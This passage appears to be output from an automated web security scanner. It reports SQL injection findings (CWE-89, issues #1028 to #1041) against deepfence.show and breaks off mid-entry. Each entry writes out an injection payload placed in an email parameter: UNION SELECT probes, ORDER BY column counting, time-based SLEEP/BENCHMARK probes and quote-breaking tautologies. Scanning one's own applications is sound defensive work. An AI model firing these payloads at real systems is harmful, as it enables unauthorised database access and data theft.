HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1028\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1029Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1030\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1031\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1032\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io/*…*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1033\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or ((\"x\"))=((\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1034\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1035\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioadmin\" --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1036\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' UNION SELECT sum(columnname ) from tablename\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1037\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1038\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A'))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1039\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1040Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ')) or (('x'))=(('x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1041\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 